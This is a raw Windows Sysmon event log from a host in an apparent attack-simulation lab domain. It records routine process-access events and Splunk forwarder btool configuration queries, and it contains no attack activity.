13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1401-000000009101}1512C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-85E8-5FCF-1301-000000009101}25601244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E8-5FCF-1401-000000009101}1512C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.197{10ACEC4A-85E8-5FCF-1401-000000009101}1512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E8-5FCF-1301-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 10341000x80000000000000006974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1301-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1301-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-85E8-5FCF-1201-000000009101}42164584C:\Windows\system32\cmd.exe{10ACEC4A-85E8-5FCF-1301-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.192{10ACEC4A-85E8-5FCF-1301-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E8-5FCF-1201-000000009101}4216C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 10341000x80000000000000006961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1201-000000009101}4216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 